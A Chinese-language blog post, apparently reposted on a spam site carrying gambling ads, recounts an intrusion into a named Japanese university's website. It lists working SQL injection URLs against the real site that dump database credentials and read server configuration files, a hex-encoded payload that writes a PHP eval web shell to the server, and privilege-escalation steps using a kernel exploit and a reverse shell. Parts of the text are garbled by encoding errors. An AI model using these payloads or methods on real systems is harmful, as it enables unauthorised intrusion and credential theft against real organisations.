盈讯足球比分网|华体足球比分直播|
关注我们
QRcode 邮件联系 QRcode

入侵日本同志社大学技术分析

 feng  1,594 ℃  0条点评

入侵日本同志社大学技术分析

http://www.doshisha.ac.jp/chs/news/index.php?i=-1
然后联?#21916;?#35810;,猜字段,查版本,查密码,读取文件.......就是各种查啊,语句是:

http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file('/etc/httpd/conf/httpd.conf'),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user

 

    1. //@@datadir为数据库文件路径

 

    1. //load_file读取网站容器apache的配置文件

 

  1. //group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机

复制代码

虽然解得MySQL的root账户密码为mysql00,但是host为localhost,只允许本机登陆,所以用处不大。

而且Apache的配置文件?#20801;荊?#26381;务器拒绝非该大学的ip访问/admin/和phpMyAdmin,所以?#35789;?#29190;出管理员账户密码也没用。
(大家对以上各种查和语句不太懂的可以参考以下文章:http://bbs.blackbap.org/thread-2243-1-1.html)

前面load_file是因为发现了各文件夹权限限制的死,不允许外校ip登陆,所以就猜了一下apache的配置文件绝?#26376;肪段?#40664;认,后来发现还真的是默?#31995;?#36335;径。
如果知道怎么猜apache配置文件的路径的请参考以下文章:http://bbs.blackbap.org/thread-2242-1-1.html

既然已经知?#25042;薃pache的配置文件?#21738;?#23481;,我们也就轻?#23383;懒?#32593;站物理路径,路?#27573;?http/www/koho/
虽然/admin和phpMyAdmin?#21738;柯级?#38480;制了,但是想了想,我?#20405;?#35201;有注入点?#28034;梢钥?#20197;写入shell了,因为php的GPC为off,怎?#30913;?#26029;为off我就不?#30423;恕?br /> 直?#26377;?#19968;句话:

http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+'/http/www/koho/english/engnews_img/aa.php'#

 

    1. //最后的#是为了闭合前面的语句

 

    1. /*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E

 

    1. 为一句话<?php @eval($_POST['cmd']);?>的HEX编码,不懂(HEX编码)的话Google一下就好*/

 

    1. //如果直接select 一句话 into outfile '路径'会提示字段数不同,所以select 1,2,3,4...来执行注入语句

 

    1. //后面的0x3c3f2f2a和0x2a2f3f3e分别为'<?php //'的和'?>'HEX因为select后面的3,4,5,6会被写入webshell?#26657;?#21487;能会导致一句话执?#20889;?#35823;

 

  1. //所以最后aa.php?#21738;?#23481;就是"<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>"

复制代码

HEX其实就是十六进?#31080;?#30721;,不知?#21202;?#20010;编码的话,去搜一下好了,HEX编码转换在线本地各种工具各种有
通过上述注入语句,我们就得到了一句话木马:

 

 

  1. http://www.doshisha.ac.jp/english/engnews_img/aa.php

复制代码

用?#35828;?#36830;接,密码是cmd,如图所示:
然后在命令提示行里看了一下,现在的权限是:

之后按照惯例我看了一下/tmp/文件?#26657;?#21457;现/TMP/权限居然被禁掉了,很少有服务器禁掉这个文件夹的。
好在赋权给这个文件夹不需要root,直接执行赋权语句:

 

 

  1. chmod +x /tmp/

复制代码

在这说一下,linux里面的文件夹跟文件一样,执行命令自然?#37096;?#20197;按照像文件一样的执行
然后就查了一下内核版本:

 

 

    1. uname-a

 

  1. //其实lsb_release -a

复制代码

如图所示:

内核版本:linux mainz1 2.6.28-194.e15
系统描述为:Red Hat Enterprise Linux Server release 5.5 (Tikanga)
查完了系统版本之后就去找找相应的提权脚本!~然后传到/tmp/文件夹

然后给予执行权限
一般我都是传?#20808;源文件,然后"gcc -o /tmp/程序 /tmp/C源码"这样,如果gcc不能用,在其他机器编译好了直接传?#20808;?#20854;实?#37096;?#20197;,就像这样

 

 

  1. chmod +x /tmp/2.6.18-194

复制代码 然后直接执?#26657;

总结:
这个注入点的基本思路就是,发现MySQL账户为root,GPC设置为off,搞到了物理路径就直?#26377;碬ebshell了
提权部分原理就是,本地监听端口,将对方机器反弹回cmdshell来,然后把和内核版本对应的EXP传?#20808;ィ?#32534;译运?#26657;?#24471;到root

本文标签:
全国大部分高校所用正方教务系统漏洞
浅谈网络营销有哪些特点和原则
Joy:一款用于捕获和分析网络内部流量数据的工具Joy:一款用于捕获和分析网络内部流量数据的工具One-Lin3r:懒人的福音,渗透测试单行化工具One-Lin3r:懒人的福音,渗透测试单行化工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具国产网站恶意代码监测(网马监控)工具优化版国产网站恶意代码监测(网马监控)工具优化版

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国?#20351;?#20363;, 沙发拿下 . . .


盈讯足球比分网
金鹰团队精准pk10计划 北京pk拾计划两期 时时彩技巧0369 2358 北京时时规律破解教程 2018全年无错30码特围 怎么玩时时彩稳赚 云南时时计划软件手机版 彩票网上投注是否合法 老重庆时时开奖号码 pk10平投技巧稳赚